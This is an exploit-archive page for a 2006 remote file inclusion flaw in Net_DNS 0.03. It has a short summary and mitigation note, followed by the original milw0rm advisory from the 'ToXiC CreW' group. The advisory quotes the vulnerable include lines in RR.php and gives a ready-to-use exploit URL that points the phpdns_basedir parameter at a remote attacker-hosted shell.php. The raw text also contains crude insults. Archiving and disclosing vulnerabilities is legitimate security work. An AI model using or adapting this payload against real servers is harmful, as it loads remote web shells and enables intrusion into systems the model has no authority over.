header-logo
Suggest Exploit
vendor:
Net_DNS
by:
ToXiC CreW
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Net_DNS
Affected Version From: Net_DNS-0.03
Affected Version To: Net_DNS-0.03
Patch Exists: YES
Related CWE: N/A
CPE: Net_DNS
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Net_DNS: Remote File Inclusion by ToXiC CreW

Net_DNS is vulnerable to a remote file inclusion vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. This URL can be used to execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent malicious user-supplied input from being used to execute arbitrary code.
Source

Exploit-DB raw data:

###### ToXiC #########################
#
# Net_DNS: Remote File Inclusion by ToXiC CreW
#
#         ToXic Security Italian CreW
#            BuG FounD by Drago84
#
# Application Affect:
#                      Net_DNS-0.03
#
#
#  Sorce Code:
#             http://gentoo.osuosl.org/distfiles/Net_DNS-0.03.tgz
#
#
# Page:
#         RR.php
#
#
# Dir :
#      /DNS/
#
#
#
#
# Problem:
#         /* Include files {{{ */
#         require_once("$phpdns_basedir/DNS/RR/A.php");
#         require_once("$phpdns_basedir/DNS/RR/NS.php");
#         require_once("$phpdns_basedir/DNS/RR/CNAME.php");
#            require_once("$phpdns_basedir/DNS/RR/PTR.php");
#            require_once("$phpdns_basedir/DNS/RR/SOA.php");
#            require_once("$phpdns_basedir/DNS/RR/MX.php");
#            require_once("$phpdns_basedir/DNS/RR/TSIG.php");
#        /* }}} */#
#
#
# ExPloit :
#   http://www.site.com/Net_DNS_PATH/DNS/RR.php?phpdns_basedir=http://sonic-banda-di-lamer.gay/shell.php?
#
#
#
#       
# GrEatZ All Member of ToXiC, Str0ke
#
#
# FUCK #Sonic
#
###### ToXiC #########

# milw0rm.com [2006-10-22]